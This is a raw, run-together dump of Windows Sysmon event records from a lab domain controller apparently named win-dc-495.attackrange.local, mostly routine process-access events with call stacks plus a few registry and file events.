10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.283{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.283{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005d8) 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.283{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.283{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.205{59A5CD1D-8E47-6005-1F00-00000000A301}23002320C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:59.205{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.205{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1F00-00000000A301}2300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.189{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-01-18 13:33:59.189 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
